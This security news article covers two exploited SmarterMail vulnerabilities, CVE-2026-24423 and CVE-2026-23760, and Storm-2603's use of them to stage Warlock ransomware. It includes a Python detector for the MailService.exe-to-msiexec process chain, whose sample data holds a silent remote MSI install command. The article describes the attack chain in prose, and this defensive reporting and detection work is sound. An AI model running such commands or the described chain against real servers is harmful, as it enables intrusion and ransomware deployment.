Ransomware, Vulnerability Management, Patch/Configuration Management, Email security

SmarterMail vulnerabilities exploited in ransomware campaigns

Ransomware groups are actively exploiting two recently patched SmarterTools SmarterMail vulnerabilities that could lead to remote code execution (RCE) without authentication.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added one of the critical flaws, tracked as CVE-2026-24423, to its Known Exploited Vulnerabilities catalog on Thursday, flagging it as being actively exploited in ransomware campaigns.

CVE-2026-24423, which was patched on Jan. 23, 2026, allows attackers to abuse SmarterMail’s ConnectToHub API to deliver a malicious OS command from a remote server, achieving unauthenticated RCE.

The other critical flaw, tracked as CVE-2026-23760, enables authentication bypass via the password reset API. The force-reset-password endpoint fails to verify that the supplied old password is correct, allowing anyone to reset a password by supplying just a username. This could be exploited to reset administrator passwords and gain full control over a vulnerable SmarterMail instance.

SmarterMail vulnerabilities exploited by China-based threat group

ReliaQuest reported Monday that a China-based ransomware threat actor tracked as Storm-2603 was actively exploiting CVE-2026-23760 and explained how the group abused SmarterMail’s built-in “Volume Mount” feature to escalate from authentication bypass to RCE.

Although no ransomware executable was deployed in the observed attack, ReliaQuest said the activity was consistent with Storm-2603’s staging for Warlock ransomware.

The Volume Mount feature allows administrators to provide commands for mounting network drives but accepts arbitrary commands due to trust in the administrator role, ReliaQuest explained. After leveraging the password reset flaw to gain admin access, Storm-2603 used this feature to execute malicious commands and install the forensic software Velociraptor, which it uses as a backdoor.

Velociraptor is a legitimate open-source endpoint monitoring, digital forensics and incident response software that Storm-2603 has been known to abuse for command-and-control (C2) communications and staging for Warlock ransomware.

In the attack targeting SmarterMail for initial access, the group used the SmarterMail process MailService.exe to spawn a command shell and ultimately trigger the Windows Installer to install a payload called v4.msi hosted on the legitimate cloud-based platform Supabase. ReliaQuest noted that Storm-2603 previously hosted payloads on GitHub, with the shift to Supabase likely aiding in evasion due to the platform’s trusted reputation.

The v4.msi payload installs Velociraptor, which is then configured for C2 connection to the attacker’s server. The use of legitimate forensics software also lowers the chance of detection, and typically precedes Warlock ransomware deployment in Storm-2603 attacks.
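As an added detection example (not code from the article or from ReliaQuest), the following Python sketch walks process-creation events looking for the chain described above: MailService.exe spawning a command shell that in turn launches the Windows Installer against a remote .msi. The event schema, PIDs and the example.invalid URL are constructed for this example; a shell child of MailService.exe with no msiexec follow-on is still reported, at lower severity, because the legitimate Volume Mount feature can also produce one.

```python
"""Flag MailService.exe -> shell -> msiexec <remote .msi> process chains.
Event schema and all sample values below are constructed for this example."""
from dataclasses import dataclass
from typing import Dict, List

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
MAIL_PROCESS = "mailservice.exe"   # SmarterMail service binary named in the report


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def find_smartermail_chains(events: List[ProcEvent]) -> List[Dict]:
    """One finding per shell spawned by MailService.exe; severity is 'high'
    when that shell ran msiexec with an http(s) URL to a .msi package."""
    by_pid = {e.pid: e for e in events}
    children: Dict[int, List[ProcEvent]] = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e)
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None or _basename(parent.image) != MAIL_PROCESS:
            continue
        if _basename(e.image) not in SHELLS:
            continue
        remote_msi = [c.cmdline for c in children.get(e.pid, [])
                      if _basename(c.image) == "msiexec.exe"
                      and "http" in c.cmdline.lower() and ".msi" in c.cmdline.lower()]
        findings.append({"shell_pid": e.pid, "shell": e.cmdline, "remote_msi": remote_msi,
                         "severity": "high" if remote_msi else "medium"})
    return findings


# Constructed sample telemetry; the URL is a placeholder, not real infrastructure.
SAMPLE = [
    ProcEvent(100, 1, r"C:\Windows\System32\services.exe", "services.exe"),
    ProcEvent(200, 100, r"C:\SmarterMail\Service\MailService.exe", "MailService.exe"),
    ProcEvent(300, 200, r"C:\Windows\System32\cmd.exe", 'cmd.exe /c "msiexec ..."'),
    ProcEvent(400, 300, r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe /i https://example.invalid/v4.msi /qn"),
    ProcEvent(500, 200, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c net use Z: \\fileserver\share"),
]

if __name__ == "__main__":
    for finding in find_smartermail_chains(SAMPLE):
        print(finding)
```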

ReliaQuest said it also observed suspicious ConnectToHub API calls on the affected SmarterMail server, indicating likely scanning for susceptibility to CVE-2026-24423. However, these calls came from infrastructure separate from that used by Storm-2603 and may have originated from a different threat actor.

The researchers noted that both vulnerabilities offer a path to RCE for threat actors and that the discovery of artifacts for both vulnerabilities on the same instance highlights the urgent need to patch both flaws.

Both flaws can be resolved by upgrading to SmarterMail Build 9511. ReliaQuest also recommends isolation of the mail server from the rest of the internal network and restriction of outbound mail server traffic to only necessary email protocols.
